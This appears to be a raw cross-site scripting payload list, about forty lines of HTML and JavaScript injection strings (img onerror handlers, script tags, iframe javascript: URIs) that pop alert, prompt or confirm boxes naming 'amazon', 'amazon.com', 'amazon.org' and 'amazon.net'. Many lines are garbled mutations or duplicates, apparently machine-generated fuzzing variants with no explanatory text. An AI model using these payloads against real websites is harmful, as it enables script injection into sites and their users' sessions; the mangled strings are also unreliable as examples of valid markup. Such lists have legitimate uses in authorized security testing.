element[attribute='<img src=x onerror=alert('amazon')//">
</T><img src=script>confirm('varamazon')</script>
<style><img src="<><><img src=x onerror=alert('amazon.net')//">
<script>
<11<1=href=11=1="javascript:('amazon.org')"><><>
element[attribute='<img src=x onerror=alert('amazon.com')//">
<script>('var0')</script>
<form><iframe 1&#09; srcsrc=javascriptjavascriptjavascriptprompt('amazon')""">
<---<img src="--><img src=x onerror=alert('amazon.com')//">
<style><img src="<><><img src=x onerror=alert('amazon.com')//">
<iframe /src=src=ata::texthtmlm<,<SSPACE##src=load=alert('svg')>">
<11<1=href=11=1="javascript:('amazon.net')"><><>
<form><iframe 1&#09; srcsrc=javascriptjavascript&#58;prompt('amazon.org')""">
<script>('amazon'))</script>
<form><iframe 1&#09; srcsrc=javascriptjavascript&#58;prompt('amazon')""">
</T><img src=script>confirm('varamazon.org')</script>
<script>('amazon.net'))</script>
<marquee><script>prompt('amazon')</script></>
<urlscript><script>('amazon.net')</script></>
element[attribute='<img src=x onerror=alert('amazon.com')//">
<urlscript><script>('amazon.org')</script></>
<marquee><script>('amazon')</script></script>
<---<img src="--><img src=x onerror=alert('amazon.org')//">
<</src=<"script>javascript:confirm('amazon')<script>">
<---<img src="--><img src=x onerror=alert('amazon.com')//">
<script>
<style><img src=<"><imgimg src=x onerror=alert('amazon.net')//">
<iframe /src=src=ata::texthtmlm<,<SSPACE##src=load=alert('svg')>">
<iframe /src=src=ata::texthtmlm<,<SSPACE##src=load=alert('svg')>">
</T><img src=script>confirm('varamazon')</script>
<iframe /src=src=aa::texthtmmm,<svgsrc=load=alert('svg')>">
<style><<img src="><><img src=x onerror=alert('amazon.org')//">
<script>('amazon.org')</script>
<</src=111h=1="javascript:('('amazon.com')"><><>
element[attribute='<img src=x onerror=alert('amazon.net')//">
</><script>
</T><img src=script>confirm('varamazon.com')</script>
<iframe script><script>confirm('amazon.net')</script></>
<urlscript><script>('amazon')</script></>
<----<img src=--------alert'varamazon.com')--!>